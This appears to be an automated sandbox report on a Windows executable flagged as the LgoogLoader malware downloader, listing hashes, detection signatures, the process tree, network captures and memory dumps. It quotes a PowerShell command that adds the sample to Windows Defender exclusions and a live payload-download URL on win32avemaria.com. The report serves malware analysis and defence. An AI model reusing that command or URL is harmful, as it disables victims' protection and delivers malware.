Overview

overview

10

Static

static

1

c4290abc9b...75.exe

windows7-x64

1

c4290abc9b...75.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/02/2024, 04:30 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe

  • Size

    40KB

  • MD5

    fcb6adcf738982cca1afdf3710ba489b

  • SHA1

    5b62a4044f9598085ea48d1984d901c85ec88723

  • SHA256

    c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75

  • SHA512

    40d64e13d0d34efeb1c1c3dc4f3755a393aab85baa2e29f3f9587300d3142d68cc4eb00fe274b2337b4cd1d3a2fa89bdf484fd0c484d36abe2cdd89d26142b4e

  • SSDEEP

    768:Gro0B38UZCob4fgl4zmzU6+8NaL7oRoEOqBEFiRmmY:GJsI0gl4zYQ7aoEOUeiZY

Score
10/10
lgoogloaderdownloaderevasiontrojan

Malware Config

Signatures

  • Detects LgoogLoader payload 1 IoCs
  • LgoogLoader

    A downloader capable of dropping and executing other malware families.

    downloaderlgoogloader
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 2 IoCs
    evasiontrojan
  • Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF 1 IoCs
  • Detects Windows executables referencing non-Windows User-Agents 1 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 1 IoCs
  • Detects executables embedding command execution via IExecuteCommand COM object 1 IoCs
  • Detects executables potentially checking for WinJail sandbox window 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Windows security modification 2 TTPs 3 IoCs
    evasiontrojan
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe
    "C:\Users\Admin\AppData\Local\Temp\c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2424
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2560
    • C:\Windows\SysWOW64\calc.exe
      "C:\Windows\SYSWOW64\calc.exe"
      2⤵
        PID:4648

    Network

    • flag-us
      DNS
      win32avemaria.com
      c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe
      Remote address:
      8.8.8.8:53
      Request
      win32avemaria.com
      IN A
      Response
      win32avemaria.com
      IN A
      104.21.44.169
      win32avemaria.com
      IN A
      172.67.201.151
    • flag-us
      GET
      http://win32avemaria.com/get/65c8394c1b03047c18291f8a
      c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe
      Remote address:
      104.21.44.169:80
      Request
      GET /get/65c8394c1b03047c18291f8a HTTP/1.1
      Host: win32avemaria.com
      Connection: close
      Response
      HTTP/1.1 200 OK
      Date: Mon, 12 Feb 2024 06:50:17 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Cache-Control: no-cache, no-store, max-age=0
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KBs7qG8%2BQVAxiG9R%2FS6VQ4myx76Qme%2FS05F0l7B6XF4uRFKPNfptibjwFNFBuNbodcg%2FzqHFlJmA6jokfv%2FUuyx%2Bb80v2F6Xx1Z27hy4GBIO05mL5luvY81DnzqSxU7ml4F4Cg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8542e5838e4471b1-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      13.86.106.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      13.86.106.20.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      169.44.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      169.44.21.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      194.178.17.96.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      194.178.17.96.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      74.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      74.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.134.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.134.221.88.in-addr.arpa
      IN PTR
      Response
      18.134.221.88.in-addr.arpa
      IN PTR
      a88-221-134-18deploystaticakamaitechnologiescom
    • flag-us
      DNS
      180.178.17.96.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      180.178.17.96.in-addr.arpa
      IN PTR
      Response
      180.178.17.96.in-addr.arpa
      IN PTR
      a96-17-178-180deploystaticakamaitechnologiescom
    • flag-us
      DNS
      13.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      13.227.111.52.in-addr.arpa
      IN PTR
      Response
    • 104.21.44.169:80
      http://win32avemaria.com/get/65c8394c1b03047c18291f8a
      http
      c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe
      46.7kB
       2.1MB
       925
      1489

      HTTP Request

      GET http://win32avemaria.com/get/65c8394c1b03047c18291f8a

      HTTP Response

      200
    • 8.8.8.8:53
      win32avemaria.com
      dns
      c4290abc9b05d22cb4112768759acf854f881d08e697528fa2549740f89b9d75.exe
      63 B
       95 B
       1
      1

      DNS Request

      win32avemaria.com

      DNS Response

      104.21.44.169
      172.67.201.151

    • 8.8.8.8:53
      13.86.106.20.in-addr.arpa
      dns
      71 B
       1

      DNS Request

      13.86.106.20.in-addr.arpa

    • 8.8.8.8:53
      169.44.21.104.in-addr.arpa
      dns
      72 B
       1

      DNS Request

      169.44.21.104.in-addr.arpa

    • 8.8.8.8:53
      194.178.17.96.in-addr.arpa
      dns
      72 B
       1

      DNS Request

      194.178.17.96.in-addr.arpa

    • 8.8.8.8:53
      74.32.126.40.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      74.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      18.134.221.88.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      18.134.221.88.in-addr.arpa

    • 8.8.8.8:53
      180.178.17.96.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      180.178.17.96.in-addr.arpa

    • 8.8.8.8:53
      13.227.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      13.227.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hz4mw04o.gqo.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2424-19-0x00000000745B0000-0x0000000074D60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2424-0-0x0000000000A70000-0x0000000000A7E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/2424-2-0x0000000002E80000-0x0000000002E9A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2424-3-0x0000000005B40000-0x00000000060E4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2424-4-0x0000000005480000-0x0000000005512000-memory.dmp

      Filesize

      584KB

      Download

    • memory/2424-5-0x0000000005670000-0x0000000005680000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2424-6-0x0000000005540000-0x000000000554A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2424-7-0x0000000007D00000-0x0000000007D9C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/2424-8-0x0000000008DC0000-0x0000000008FB2000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/2424-1-0x00000000745B0000-0x0000000074D60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2560-52-0x0000000006D40000-0x0000000006D5A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2560-14-0x00000000745B0000-0x0000000074D60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2560-62-0x00000000745B0000-0x0000000074D60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2560-20-0x0000000000E00000-0x0000000000E10000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2560-59-0x0000000007060000-0x0000000007068000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2560-29-0x0000000005390000-0x00000000053F6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2560-11-0x0000000000C70000-0x0000000000CA6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2560-22-0x0000000004CF0000-0x0000000004D56000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2560-21-0x0000000004A50000-0x0000000004A72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2560-57-0x0000000006F80000-0x0000000006F94000-memory.dmp

      Filesize

      80KB

      Download

    • memory/2560-16-0x0000000000E00000-0x0000000000E10000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2560-33-0x0000000005630000-0x0000000005984000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2560-15-0x0000000004D60000-0x0000000005388000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/2560-34-0x0000000005A10000-0x0000000005A2E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2560-35-0x0000000005FF0000-0x000000000603C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2560-58-0x0000000007080000-0x000000000709A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2560-48-0x0000000005F60000-0x0000000005F7E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2560-50-0x0000000006C60000-0x0000000006D03000-memory.dmp

      Filesize

      652KB

      Download

    • memory/2560-51-0x0000000007390000-0x0000000007A0A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/2560-56-0x0000000006F70000-0x0000000006F7E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/2560-53-0x0000000006DB0000-0x0000000006DBA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2560-49-0x0000000000E00000-0x0000000000E10000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2560-38-0x0000000070470000-0x00000000704BC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2560-37-0x0000000006A20000-0x0000000006A52000-memory.dmp

      Filesize

      200KB

      Download

    • memory/2560-36-0x000000007FAB0000-0x000000007FAC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2560-54-0x0000000006FC0000-0x0000000007056000-memory.dmp

      Filesize

      600KB

      Download

    • memory/2560-55-0x0000000006F40000-0x0000000006F51000-memory.dmp

      Filesize

      68KB

      Download

    • memory/4648-10-0x0000000000400000-0x0000000000440000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4648-12-0x0000000000400000-0x0000000000440000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4648-17-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

      Filesize

      36KB

      Download

    • memory/4648-9-0x0000000000400000-0x0000000000440000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4648-18-0x0000000000BE0000-0x0000000000BED000-memory.dmp

      Filesize

      52KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.